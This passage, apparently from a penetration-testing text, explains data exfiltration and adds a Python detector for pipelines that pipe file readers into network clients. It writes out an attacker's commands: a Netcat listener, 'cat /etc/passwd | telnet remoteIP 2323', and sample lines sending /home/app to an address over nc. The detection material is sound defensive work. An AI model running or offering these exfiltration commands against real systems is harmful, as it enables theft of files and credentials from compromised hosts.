The unauthorized transfer of digital data from any environment is known as exfiltration of data (or extrusion of data). Once persistence is maintained on a compromised system, a set of tools can be utilized to exfiltrate data from highly secure environments.
In this section, we will explore different methods that attackers utilize to send files from internal networks to attacker-controlled systems.
Firstly, we will discuss some easy techniques to quickly grab files when access to compromised systems is time-limited. Attackers can simply open up a port using Netcat by running nc -lvp 2323 > Exfilteredfile, and then run cat /etc/passwd | telnet remoteIP 2323 from the compromised Linux server.
This will send the entire contents of /etc/passwd to the remote host, as shown in the following screenshot:
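From a detection standpoint, the cat-into-telnet pipeline described above is visible in process command-line telemetry (shell history, audit or EDR records). The following Python sketch is an added example, not part of the original text; the program lists, function names and sample command lines are assumptions constructed for illustration.

```python
import shlex

# Assumed (not exhaustive) program lists; tune them to your environment.
FILE_READERS = {"cat", "head", "tail", "dd", "tar", "zcat", "base64"}
NET_CLIENTS = {"telnet", "nc", "ncat", "netcat"}

def prog(stage):
    return stage[0].rsplit("/", 1)[-1]  # program name without its directory

def split_pipeline(cmdline):
    """Split a shell command line into pipeline stages (argv token lists)."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    stages = [[]]
    for tok in lex:
        if tok == "|":
            stages.append([])
        else:
            stages[-1].append(tok)
    return [s for s in stages if s]

def find_exfil_pipelines(cmdlines):
    """Flag pipelines where a file reader feeds stdin of a raw network client."""
    findings = []
    for line in cmdlines:
        try:
            stages = split_pipeline(line)
        except ValueError:  # unbalanced quotes, cannot tokenize
            continue
        for i, stage in enumerate(stages):
            readers = [s for s in stages[:i] if prog(s) in FILE_READERS]
            if prog(stage) not in NET_CLIENTS or not readers:
                continue
            dest = [a for a in stage[1:] if not a.startswith("-")]
            findings.append({
                "cmdline": line,
                "reader": prog(readers[0]),
                "paths": [a for a in readers[0][1:] if a.startswith("/")],
                "host": dest[0] if dest else None,
                "port": int(dest[-1]) if dest and dest[-1].isdigit() else None,
            })
    return findings

# Constructed sample command lines (192.0.2.10 is a documentation address).
SAMPLE = [
    "cat /etc/passwd | telnet 192.0.2.10 2323",
    "cat /var/log/syslog | grep -i error",
    "telnet mail.example.com 25",
    "tar cf - /home/app | gzip -9 | nc 192.0.2.10 2323",
]
```

Calling find_exfil_pipelines(SAMPLE) reports the first and last lines only; an interactive telnet session and a local cat-into-grep pipeline are not flagged.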
Another important and fairly simple technique used by attackers with access to any system on the network is to run...